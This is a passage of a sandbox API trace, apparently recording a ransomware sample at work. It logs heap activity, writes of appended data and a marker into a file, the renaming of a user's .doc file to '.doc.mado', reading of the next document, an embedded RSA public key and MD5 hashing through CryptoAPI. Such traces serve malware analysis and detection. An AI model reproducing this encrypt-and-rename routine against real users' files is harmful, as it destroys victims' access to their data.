[0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf20 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e240 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf38 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf68 [0203.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfb0 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf80 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b67078 [0203.971] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b70b68 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf68 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf80 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfb0 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfb0 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdf80 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdf68 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf80 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf68 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfb0 | out: hHeap=0x2c0000) returned 1 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.972] GetCurrentThreadId () returned 0x600 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68078 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x324240 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68498 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.972] GetCurrentThreadId () returned 0x600 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68390 [0203.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68288 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfb0 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf68 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf80 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf50 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfc8 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf98 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfe0 [0203.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf68 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdf68 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfb0 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bdb0 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfe0 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bb80 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf68 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0203.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68180 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68390 | out: hHeap=0x2c0000) returned 1 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68180 | out: hHeap=0x2c0000) returned 1 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0203.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf98 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfc8 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf80 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf50 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68498 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdf38 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e240 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68288 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.975] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x164ae, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x164ae, lpOverlapped=0x0) returned 1 [0203.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.976] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x164b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.976] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b70b68 [0203.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.976] WriteFile (in: hFile=0x63c, lpBuffer=0x3b70b68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b70b68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0203.976] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.976] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.976] CloseHandle (hObject=0x63c) returned 1 [0203.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b70b68 [0203.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.978] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2A46Wijpabeg.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2a46wijpabeg.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2A46Wijpabeg.doc.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2a46wijpabeg.doc.mado")) returned 1 [0203.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0203.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.978] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0203.979] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb28e6330, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0x1242ef10, ftLastAccessTime.dwHighDateTime=0x1d5e828, ftLastWriteTime.dwLowDateTime=0x1242ef10, ftLastWriteTime.dwHighDateTime=0x1d5e828, nFileSizeHigh=0x0, nFileSizeLow=0x19cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DZkt_Zg.csv", cAlternateFileName="")) returned 1 [0203.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0203.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.980] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4DZkt_Zg.csv") returned=".csv" [0203.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4DZkt_Zg.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4dzkt_zg.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.980] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=6605) returned 1 [0203.980] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.982] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x19a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.982] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.984] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.984] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x19cd, lpOverlapped=0x0) returned 1 [0203.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.984] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.985] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.985] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.985] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.985] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.986] GetLastError () returned 0x0 [0203.986] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.986] CryptReleaseContext 